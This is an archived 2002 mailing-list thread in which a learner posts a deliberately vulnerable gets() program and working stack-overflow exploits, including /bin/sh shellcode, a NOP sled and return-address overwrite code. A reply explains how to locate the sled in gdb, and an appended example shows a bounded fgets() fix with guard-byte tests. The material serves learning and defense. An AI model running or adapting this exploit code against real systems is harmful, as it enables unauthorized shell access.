Odds are, at least on my computer, your malicious buffer full of wonderful things (nops, shellcode, etc.) is NOT where esp was at the time of the crash. There may be other things on the stack. So, here's what I'd do.

Run your exploit (unsuccessfully of course) and examine the core (gdb <vuln program> <core>). Examine from where esp was, and keep going until you see a bunch of nops. E.g. x/10i $esp should (I haven't used gdb for a while, it's something along those lines) show you all the instructions starting from the address esp holds, 10 lines at a time (hit enter to continue). So you might see something like this (assuming $esp is 0x1):

    0x1  jmp mypenis
    0x2  xor eax,eax
    0x3  sub eax, 9
    <7 other instructions>
    [hit enter]
    0x10 add eax, 10
    0x11 sub eax, 69
    0x12 (bad)
    0x13 nop
    0x14 nop
    0x15 nop
    0x16 nop
    0x17 nop
    0x18 nop
    0x19 nop

As you can see, the data you put on the stack started at 0x13, and not at 0x1 (where esp was). So use that address as your return address. If it still doesn't work, let me know.

- Brandon Erhart

At 12:55 PM 7/24/2002 -0700, Jeremy Junginger wrote:
>In reading the following link, I decided to play with the examples and
>try to figure out a simple buffer overflow. Just to say I've at least
>made one do something predictable. At any rate, I have gotten to the
>point where I can make the program call the function twice before
>dumping. I am a little stuck when it comes to inserting the shellcode.
>I'll highlight what I think is the code I'm not understanding
>completely. Please take a look if you have time, and even if you don't,
>thanks for reading the post:
>
>http://www.neworder.box.sk/newsread.php?newsid=5333
>
>Below is a modified version of the code presented on the above link. I
>assume NO CREDIT for this code other than I have changed a couple of
>variables. I'm just trying to illustrate a concept rather than create
>something original at this point.
>Keeping this in mind, read on:
>
>--------------------------------
>
>/*This one works:*/
>/*PROGRAM WITH BUFFER OF 255*/
>/*TESTDS.C*/
>#include <stdio.h>
>
>/* gets() has no length limit, so input longer than 255 bytes runs past
> * small[] into the saved frame pointer and return address. */
>void lame() {
>char small[255];
>gets(small);
>printf("%s\n",small);
>}
>int main() {
>lame();
>return 0;
>}
>
>-----------------------------------
>
>/*Running this one and piping the output to testds makes the program run
>twice:*/
>/*PROGRAM TO OVERFLOW TESTDS*/
>/*This will hit call lame twice, so the output should be two identical
>lines followed by a core dump*/
>/*If it does not core dump, issue the ulimit -c 10000 command*/
>/*TESTDS_EXPLOIT.C*/
>#include <stdio.h>
>
>int main()
>{
>int i=0;
>/* the loop below writes 4 bytes at i=268 as well, so the array must
> * hold 272 bytes plus a terminator for puts() */
>char buf[273];
>for(i=0;i<=268;i+=4)
>*(long*) &buf[i] = 0x80484ca; /* address of the call to lame() */
>buf[272] = '\0';
>puts(buf);
>return 0;
>}
>
>------------------------------------
>
>/*I don't think I have the memory address or something correct. This is
>where I need help. Anyone?!?*/
>/*PROGRAM TO RUN SHELLCODE FROM TESTDS*/
>/*1 Fill the buffer with the return address,*/
>/*2 Fill the buffer with NOPS,*/
>/*3 Copy the shellcode at the end of the NOPS,*/
>/*4 set the home variable and */
>/*5 execute TESTDS.*/
>#include <stdio.h>
>#include <string.h>
>#include <stdlib.h>
>#include <unistd.h>
>
>char shellcode[] =
>"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0"
>"\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd"
>"\x80\xe8\xde\xff\xff\xff/bin/sh";
>int main()
>{
>char buffer[268];
>long retaddr = 0xbffffa10; /*Return Address, I got this from info reg
>esp after overflowing the buffer*/
>int i;
>fprintf(stderr,"using address 0x%lx\n",retaddr);
>for(i=0;i<268;i+=4)
>*(long*)&buffer[i] = retaddr; /*Fills Buffer with Ret Address*/
>for(i=0;i<(268-strlen(shellcode)-100);i++)
>*(buffer+i) = 0x90; /*Fills the Buffer with NOPS*/
>memcpy(buffer+i,shellcode,strlen(shellcode)); /*Shellcode is copied at
>the end of the NOPS*/
>setenv("HOME",buffer,1); /*Sets HOME VARIABLE*/
>execlp("TESTDS","TESTDS",(char *)NULL); /*Execute Program*/
>return 0;
>}
>
>
>Thanks for the assistance.
>-Jeremy
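The root cause in the quoted TESTDS.C is gets(): it has no way to know how big small[] is, so a 268-byte line lands on the saved frame pointer and return address, which is exactly what the exploit program relies on. The program below is an added example written for this archive page, not code from either poster. It shows the bounded counterpart of lame(): a reader built on fgets() that can never write past the array, that distinguishes "line fit" from "line truncated", and that proves the point by placing guard bytes directly after the buffer and checking they survive a 300-byte line. The struct frame, the 16-byte SMALL_SIZE, GUARD_BYTE, and the use of fmemopen() (POSIX) to feed constructed input are all assumptions of this example; they stand in for the real stack layout rather than reproducing it.

```c
/* Added example (not from the thread): a bounded replacement for the
 * quoted lame()/gets() function, with guard bytes to show the overflow
 * cannot reach whatever follows the buffer. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define SMALL_SIZE 16          /* deliberately tiny so long input is easy to construct */
#define GUARD_BYTE 0xA5        /* pattern that must still be intact after every read */

/* Stand-in for the vulnerable function's locals: the input buffer
 * followed by bytes we must never touch (think saved ebp / return
 * address). Constructed for the demonstration, not the real layout. */
struct frame {
    char small[SMALL_SIZE];
    unsigned char guard[4];
};

/* Read one line into buf (capacity n) without ever writing past it.
 * Returns 1 if the whole line fit, 0 if it was truncated (the rest of
 * the line is drained so the next read starts on a fresh line), and
 * -1 on EOF/error with nothing read. */
int read_line_bounded(FILE *in, char *buf, size_t n)
{
    if (n == 0 || fgets(buf, (int)n, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';        /* strip the newline, as gets() would */
        return 1;
    }
    /* No newline in the buffer: either EOF ended the line, the line was
     * exactly n-1 bytes (newline still unread), or it was longer. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return 1;                   /* nothing was dropped */
    while (c != '\n' && c != EOF)
        c = fgetc(in);              /* discard the overflow instead of storing it */
    return 0;
}

/* Run the bounded reader over an in-memory "stdin" and verify the guard
 * bytes survived. Returns 1 if the guard is intact and the read result
 * equals expect_result; copies the stored line to out when given. */
int lame_safe_check(const char *input, int expect_result, char *out, size_t outsz)
{
    struct frame f;
    memset(f.small, 0, sizeof f.small);
    memset(f.guard, GUARD_BYTE, sizeof f.guard);

    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return 0;
    int r = read_line_bounded(in, f.small, sizeof f.small);
    fclose(in);

    for (size_t i = 0; i < sizeof f.guard; i++)
        if (f.guard[i] != GUARD_BYTE)
            return 0;               /* would mean the buffer was overrun */
    if (out != NULL && outsz > 0) {
        strncpy(out, f.small, outsz - 1);
        out[outsz - 1] = '\0';
    }
    return r == expect_result;
}

/* Feed a constructed line of `len` 'A's plus newline (like the 268-byte
 * payload in the quoted exploit, but any length) and return 1 if the
 * guard bytes after the buffer survived and the fit/truncate verdict
 * was the expected one. */
int overflow_attempt_is_contained(size_t len)
{
    char *line = malloc(len + 2);
    if (line == NULL)
        return 0;
    memset(line, 'A', len);
    line[len] = '\n';
    line[len + 1] = '\0';
    int expect = (len < SMALL_SIZE) ? 1 : 0;   /* SMALL_SIZE-1 chars is the most that fits */
    int ok = lame_safe_check(line, expect, NULL, 0);
    free(line);
    return ok;
}

int main(void)
{
    char line[SMALL_SIZE];
    printf("short line fits, guard intact:    %d\n", lame_safe_check("hello\n", 1, line, sizeof line));
    printf("300-byte line contained:          %d\n", overflow_attempt_is_contained(300));
    printf("15-byte line (exact fit) ok:      %d\n", overflow_attempt_is_contained(15));
    printf("16-byte line reported truncated:  %d\n", overflow_attempt_is_contained(16));
    return 0;
}
```

Build with `cc -o lame_safe lame_safe.c` and run it; every line should print 1. The guard bytes are the cheap way to see the difference: with gets() the 300-byte line would overwrite them (and, in the real program, the return address), whereas read_line_bounded() stores at most 15 bytes and discards the rest, so the caller can decide what to do about an over-long line instead of the CPU deciding for it.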
This archive was generated by hypermail 2b30 : Wed Jul 24 2002 - 23:46:55 PDT